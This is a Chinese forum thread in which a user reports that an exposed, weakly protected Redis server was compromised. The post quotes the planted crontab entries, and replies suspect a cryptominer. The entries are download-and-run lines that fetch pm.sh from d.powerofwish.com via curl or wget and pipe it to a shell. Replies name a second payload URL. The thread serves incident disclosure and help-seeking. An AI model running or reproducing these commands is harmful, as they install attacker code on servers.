之前出于学习目的,就把 redis 给开着,密码也比较简单,然后就那样没管了。 crontab -e
REDIS0008ú redis-ver^E4.0.9ú
redis-bitsÀ@ú ^EctimeÂ
<98>_ú ^Hused-memÂ(Ü^L^@ú ^Laof-preambleÀ^@þ ^@û^G^@^L^Dhaha##^@^@^@ ^@^@^@^F^@^@^Ceee^E^C1.5^E^Cqqq^Eó ^B^Cwww^Eôÿ^@^EBack4@E\t
*/50 * * * * get http://d.powerofwish.com/pm.sh -O .p && bash .p
^@^EBack1?
*/20 * * * * curl -fsSL http://d.powerofwish.com/pm.sh | sh
^@^Cfoo^Cbar^@^EBack2@E
*/30 * * * * wget http://d.powerofwish.com/pm.sh -O .p && bash .p
^@^L’ ^@^Et^@^Ehello^_’ ^@^Et^@^XRedis ---> Hello, World!^@^EBack3>
*/25 * * * * cur -fsSL http://d.powerofwish.com/pm.sh | sh
ÿ>^M<81>û<99>E[f
~
有大神分析下脚本的用途吗?服务器 cpu 、内存等一切正常。
1
lc1450 2020-11-06 10:12:30 +08:00
|
2
brezp 2020-11-06 10:13:58 +08:00
估计是挖矿的, 我之前也被试过, 直接把我 CPU 打满了
|
3
dapang1221 2020-11-06 10:22:09 +08:00
感谢提醒,看见这个之后我也登上服务器看了下,发现 cpu 被 systemd-network 这个东西跑满了。。。
|
4
lc1450 2020-11-06 10:32:28 +08:00
贴下脚本内容,有兴趣的可以看看
https://paste.ubuntu.com/p/6nNDxn7m6v/ |
5
Still4 2020-11-06 11:05:57 +08:00
脚本是下载这个文件并运行 http://a.powerofwish.com/cc
应该是编译好的文件,没敢试 |
7
no1xsyzy 2020-11-06 11:22:50 +08:00
@heyjei docker 不是为了安全设计的……
而且 docker 不进行适当配置仍然有占完所有 CPU 、内存、硬盘空间、文件系统 inode 资源的能力 |
9
biguokang 2020-11-06 12:03:37 +08:00
@no1xsyzy 他的意思可能是那个脚本不敢直接在系统跑,怕会注入什么东西到系统或者删不掉,而 docker 只要 rm 掉那个 container 就没事了。。。。
|
10
lc1450 2020-11-06 12:07:43 +08:00
还发现这篇文章挺有意思的 https://www.tr0y.wang/2020/07/31/virus-beat-virus/
我就说怎么有 cur 、get,还以为是写错了,没想到这行业竞争还挺激烈 看看服务器上还有其他脚本没 |
11
coderabbit 2020-11-06 12:10:49 +08:00 via iPhone
@heyjei docker 一样被挖矿!我之前用 php 的 docker 就中招了!怎么都搞不死,无奈只好编译安装
|